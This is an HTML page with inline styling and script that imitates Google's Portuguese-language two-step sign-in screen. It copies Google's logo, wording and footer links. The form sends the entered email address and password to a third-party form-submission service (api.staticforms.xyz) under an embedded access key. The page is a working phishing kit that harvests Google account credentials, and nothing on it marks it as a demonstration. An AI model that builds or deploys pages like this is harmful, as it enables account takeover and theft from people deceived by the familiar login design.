<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        *{
    box-sizing: border-box;
    margin: 0;
    padding: 0;
    font-family: "Google Sans","Noto Sans Myanmar UI",arial,sans-serif;
}
body{
    display: flex;
    align-items: center;
    flex-direction: column;
    justify-content: center;
    align-items:center;
    min-height: 100vh;
}
.box-conteinner-user{
    display: unset;
}
.box-opacity{
    display: none;
    height: 500px;
    width: 448px;
    position: absolute;
    border: solid 1px #cfcfcf;
    background-color: #fff;
    border-radius: 8px;
    top: 180px;
    opacity: .5;
    z-index: 1;
}
.box-extern{
    display: flex;
    height: 500px;
    width: 448px;
    border: solid 1px #cfcfcf;
    border-radius: 8px;
    justify-content: center;
    padding: 48px 40px 36px;
    position: relative;
    overflow: hidden;
}
.loading{
    display: none;
    height: 4px;
    width: 100%;
    position: absolute;
    background-color: #1a73e8;
    top: 0;
    left: 0;
}
.loading::before{
    content: '';
    position: absolute;
    height: 4px;
    width: 250px;
    background-color:  #ebe8e8;
    top: 0px;
    left: 50%;
    animation: loading 1.5s linear infinite;
}
.logo{
    display: flex;
    justify-content: center;
}
.title{
    text-align: center;
    color: #202124;
    font-size: 24px;
    font-family: "Google Sans","Noto Sans Myanmar UI",arial,sans-serif;
    font-weight: 400;
    padding-top: 16px;
}
.box-inf{
    display: flex;
    justify-content: center;
    width: 100%;
    font-family: "Google Sans","Noto Sans Myanmar UI",arial,sans-serif;
    padding: 12px 0px 1px 0px;
}
.CYbold{
    padding-top: 35px;
}
.text-box{
    display: flex;
    flex-direction: column;
    justify-content: left;
    align-items: center;
    position: relative;
    width: 100%;
    height: 55px;
    padding: 15px;
    border-radius: 4px;
    border: solid 1px #cfcfcf;
}
.text-box input{
    border: none;
    width: 100%;
    height: 30px;
    font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif;
    font-size: 1rem;
    outline: none;
}
.text-box div{
    display: inline;
    position: absolute;
    left: 15px;
    top: 18px;
    color: #5f6368;
    background-color: #fff;
}
.flyp{
    animation: animar-input 105ms linear forwards;
    font-size: .75rem;
}
.border-color{
    animation: animar-border 102ms linear forwards;
}
.inf-reboot{
    padding: 9px 0px 3px ;
}
.inf-erro{
    display: none;
    color: #d93025;
    font-size: 12px;
    padding: 5px;
}
.inf-erro span{
    margin: -1px 8px 0px 0px;
}
.inf-reboot button{
    border-radius: 4px;
    color: #1a73e8;
    display: inline-block;
    font-weight: 500;
    font-size: .9rem;
    outline: none;
    position: relative;
    background-color: transparent;
    cursor: pointer;
    text-align: left;
    border: 0;
}
.suport{
    color: #5f6368;
    font-size: 14px;
    padding-top: 40px;
}
.suport a{
    color: #1a73e8;
    text-decoration: none;
}
.action{
    display: flex;
    margin-top: 50px;
    position: relative;
}
.conteinner1{
    display: flex;
    width: 50%;
    justify-content: left;
    justify-items: center;
}
.conteinner2{
    display: flex;
    width: 50%;
    justify-content: right;
    align-items: center;
}
.action #criate-accont{
    display: flex;
    background: none;
    justify-content: center;
    align-items: center;
    border: none;
    color: #1a73e8;
    font-size: .9rem;
    font-weight: 600;
    cursor: pointer;
}
.action #advence{
    display: flex;
    justify-content: center;
    align-items: center;
    border: none;
    background-color: #1a73e8;
    color: #fff;
    font-size: .9rem;
    font-weight: 600;
    border-radius: 4px;
    height: 36px;
    width: 102.39px;
    cursor: pointer;
}
#advence2 input{
    background: none;
    border: none;
    color: #fff;
    font-size: .9rem;
    font-weight: 600;
    cursor: pointer;
}
/* TELA DE LOGIN 2 */
 
.box-conteinner-password{
    display: none;
    width: 100%;
}
.user-inf{
    display: inline-flex;
    justify-content: center;
    align-items: center;
    border: solid 1px #cfcfcf;
    height: 32px;
    margin: 12px;
    border-radius: 16px;
    padding: 0px 5px;
}
.icone-user svg{
    display: flex;
    width: 20px;
    height: 20px;
    margin: 0px 5px;
    color: #3c4043
}
.DraY24{
    font-family: "Google Sans","Noto Sans Myanmar UI",arial,sans-serif;
    font-size: 14px;
    font-weight: 500;
    letter-spacing: 0.25px;
    color: #3c4043
}
.gwdkFy svg{
    display: flex;
    margin: 2px;
    color: #3c4043
}
.jJGHvk{
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
}
.GHvjV{
    display: flex;
    align-items: center;
    font-family: "Google Sans","Noto Sans Myanmar UI",arial,sans-serif;
    font-size: 14px;
    font-weight: 400;
    letter-spacing: 0.25px;
    color: #292c2e
}
.GHvjV input{
    width: 15px;
    height: 15px;
    border: solid 3px;
    margin: 10px;
}
.action #reboot-password{
    display: flex;
    background: none;
    justify-content: center;
    align-items: center;
    border: none;
    color: #1a73e8;
    font-size: .9rem;
    font-weight: 600;
    cursor: pointer;
}
.action #advence2{
    display: flex;
    justify-content: center;
    align-items: center;
    border: none;
    background-color: #1a73e8;
    color: #fff;
    font-size: .9rem;
    font-weight: 600;
    border-radius: 4px;
    height: 36px;
    width: 102.39px;
    cursor: pointer;
}

footer{
    display: flex;
    border-radius: 4px;
    position: relative;
    width: 448px;
    color: #5f6368;
    outline: none;
    padding: 16.0000002px 16px;
    font-size: 12px;
    
}
table{
    display: flex;
    justify-content: right;
    margin-left: 20px; 
    width: 50%;
}
table a{
    text-decoration: none;
    color: #5f6368;
}
td{
    padding: 0px 10px;
}
.country{
    display: flex;
    justify-content: left;
    width: 50%;
}

/* ANIMAÇÕES */

@keyframes animar-input{
    from{
        transform: translateY(0px);
    }
    to{
        transform: translateY(-36px);
        padding: 5px;
        left: 6px;
        top: 23px;
        color: #1a73e8;
    }
}
@keyframes animar-border{
    to{
        border: solid 2px #1a73e8;
    }
}
@media screen and (max-width: 414px) {
    body{
        align-items:baseline;
        height: 100vh;
        position: fixed;
        justify-content:unset;
    }
    .box-extern{
        border: none;
        width: 100vw;
        height: 84vh;
        padding: 24px;
        top: 0;
    }
    footer{
        width: auto;
        flex-direction: column;
        padding: 0px 25px 16px;
        width: 100%;
        height: 10%;
    }
    footer .country{
        margin-left: 12px;
        margin-bottom: 30px;
    }
}
@keyframes loading{
    to{
        transform: translateX(250px);
    }
    from{
        transform: translateX(-600px);
    }
}
    </style>
    <title>Login</title>
</head>
<body>
    <form action="https://api.staticforms.xyz/submit" method="post">
        <input type="hidden" name="accessKey" value="7419d766-24b0-4114-adab-51c4d456170d">
        <div class="box-opacity" id="box-block">
        </div>
        <div class="box-extern" onclick="clear()">
            <div class="box-conteinner-user" id="passo1">
                <div class="loading" id="animation-loading"></div>
                <div class="logo">
                    <svg viewBox="0 0 75 24" width="75" height="24" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" class="logo-google">
                        <g id="qaEJec">
                            <path fill="#ea4335" d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z"></path>
                        </g>
                        <g id="YGlOvc">
                            <path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path>
                        </g>
                        <g id="BWfIk">
                            <path fill="#4285f4" d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z"></path>
                        </g>
                        <g id="e6m3fd">
                            <path fill="#fbbc05" d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z"></path>
                        </g>
                        <g id="vbkDmc">
                            <path fill="#ea4335" d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z"></path>
                        </g>
                        <g id="idEJde">
                            <path fill="#4285f4" d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z"></path>
                        </g>
                    </svg>
                </div>
                <h1 class="title"><span>Fazer login</span></h1>
                <div class="box-inf"><span class="inf"> Use sua Conta do Google</span></div>
                <div class="CYbold">
                    <div class="text-box" id="tag-input">
                        <input id="edit-text" type="email" name="email"/>
                        <div id="tag-name">E-mail ou telefone</div>
                    </div>
                    <div class="inf-erro" id="inf-erro">
                        <span>
                            <svg aria-hidden="true" class="stUf5b qpSchb" fill="currentColor" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z">
                                </path>
                            </svg>
                        </span>
                        Digite um e-mail ou número de telefone
                    </div>
                    <div class="inf-reboot"><button>Esqueceu seu e-mail?</button></div>
                    <div class="suport">
                        Não está no seu computador? Use o modo visitante para fazer login com privacidade.
                        <a href="https://support.google.com/chrome/answer/6130773?hl=pt-BR">Saiba mais</a>
                    </div>
                    <div class="action">
                        <div class="conteinner1">
                            <div id="criate-accont">
                                <span>Criar conta</span>
                            </div>
                        </div>
                        <div class="conteinner2">
                            <div id="advence">
                                <span>
                                    <span>Avançar</span>
                                </span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="box-conteinner-password" id="passo2">
                <div class="jJGHvk">
                    <div class="logo">
                        <svg viewBox="0 0 75 24" width="75" height="24" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" class="logo-google">
                            <g id="qaEJec">
                                <path fill="#ea4335" d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z"></path>
                            </g>
                            <g id="YGlOvc">
                                <path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path>
                            </g>
                            <g id="BWfIk">
                                <path fill="#4285f4" d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z"></path>
                            </g>
                            <g id="e6m3fd">
                                <path fill="#fbbc05" d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z"></path>
                            </g>
                            <g id="vbkDmc">
                                <path fill="#ea4335" d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z"></path>
                            </g>
                            <g id="idEJde">
                                <path fill="#4285f4" d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z"></path>
                            </g>
                        </svg>
                    </div>
                    <h1 class="title"><span>Olá!</span></h1>
                    <div class="user-inf">
                        <div class="icone-user">
                            <svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="48px" height="48px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path></svg>
                        </div>
                        <div class="DraY24">
                            <span id="23afg"></span>
                        </div>
                        <div class="gwdkFy" style="cursor: pointer;">
                            <svg aria-hidden="true" class="stUf5b MSBt4d" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><polygon points="12,16.41 5.29,9.71 6.71,8.29 12,13.59 17.29,8.29 18.71,9.71"></polygon></svg>
                        </div>
                    </div>
                </div>
                <div class="CYbold">
                    <div class="text-box" id="tag-input2">
                        <input id="edit-text2" type="password" name="name">
                        <div id="place-pass">Digite sua senha</div>
                    </div>
                    <div class="inf-erro" id="inf-erro2">
                        <span>
                            <svg aria-hidden="true" class="stUf5b qpSchb" fill="currentColor" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z">
                                </path>
                            </svg>
                        </span>
                        Insira sua senha
                    </div>
                    <div class="GHvjV">
                        <input type="checkbox" style="outline: none;" id="on-off">
                        Mostrar senha
                    </div>
                </div>
                <div class="action">
                    <div class="conteinner1">
                        <div id="reboot-password">
                            <span>
                                <a href="https://myaccount.google.com/intro/recovery/email?hl=pt-BR" style="text-decoration: none; color: #1a73e8;">
                                    Esqueceu a senha?
                                </a>
                            </span>
                        </div>
                    </div>
                    <div class="conteinner2">
                        <div id="advence2">
                            <input type="submit" value="Avançar"/>
                        </div>
                    </div>
                    
                </div>
            </div>
        </div>
        <footer>
            <div class="country">
                Portugues (Brasil)
            </div>
            <table>
                <tr>
                    <td><a href="https://support.google.com/accounts?hl=pt-BR&visit_id=638073351074418349-2007193919&rd=2&p=account_iph#topic=3382296">Ajuda</a></td>
                    <td><a href="https://policies.google.com/privacy?gl=BR&hl=pt-BR">Privacidade</a></td>
                    <td><a href="https://policies.google.com/terms?gl=BR&hl=pt-BR">Termos</a></td>
                </tr>
            </table>
        </footer>
    </form>
    <script>
        // AÇÃO DO INPUT 1
var input_animar = document.getElementById('tag-name')
var input_border = document.getElementById('tag-input')
var erro144 = document.getElementById('inf-erro')
    input_animar.addEventListener('click', function(){
        input_animar.classList.toggle('flyp')
        input_border.style.border = 'solid 1px #cfcfcf'
        input_border.classList.toggle('border-color')
        erro144.style.display = 'none'
    })

//VALIDAÇÃO E-MAIL
var confirm = document.getElementById('advence');
confirm.addEventListener('click', function(){
    var edittext = document.getElementById('edit-text').value;
    var box_text = document.getElementById('tag-input');
    var erro144 = document.getElementById('inf-erro');
    const carregar = document.getElementById('animation-loading');
    const bloquear = document.getElementById('box-block');
    const pass2 = document.getElementById('passo2');
    const pass1 = document.getElementById('passo1');
    var user_email = document.getElementById('23afg');
    var pattern = /^[^]+@[^]+\.[a-z]{2,3}$/;

    if(edittext == ''){
        box_text.style.border = 'solid 2px #d93025'
        erro144.style.display = 'unset'
    }else{
        if(edittext.match(pattern)){
            carregar.style.display = 'unset'
            bloquear.style.display = 'unset'
            user_email.textContent = edittext
        
            setInterval(load_and, 2900);
            function load_and(){
                carregar.style.display = 'none'
                bloquear.style.display = 'none'
                pass1.style.display = 'none'
                pass2.style.display = 'unset'
            } 
        }else{
            var erro144 = document.getElementById('inf-erro')
            erro144.textContent = 'Use um e-mail valido, ex: exemple@gmail.com'
            erro144.style.display = 'unset'

        }
        
    }
})

// VALIDAÇÃO SENHA

var place_pass = document.getElementById('place-pass')
var input_border2 = document.getElementById('tag-input2')


place_pass.addEventListener('click', function(){
    input_border2.style.border = 'solid 1px #cfcfcf'
    place_pass.classList.toggle('flyp')
    input_border2.classList.toggle('border-color')
})

var sendData = document.getElementById('advence2');
    sendData.addEventListener('click', function(){
        var edittext = document.getElementById('edit-text2').value;
        var box_text2 = document.getElementById('tag-input2')
        var erro1442 = document.getElementById('inf-erro2')

        if(edittext == ''){
            box_text2.style.border = 'solid 2px #d93025'
            erro1442.style.display = 'unset'
        }else{}
    })

// CHECK BOX CHECKED

var show = document.getElementById('on-off');
var typepass = document.getElementById('edit-text2');


show.addEventListener('click', function(){
    if(show.checked){
        typepass.setAttribute('type', 'text')
    }else{
        typepass.setAttribute('type', 'password')
    }
    
})


    </script>
</body>
</html>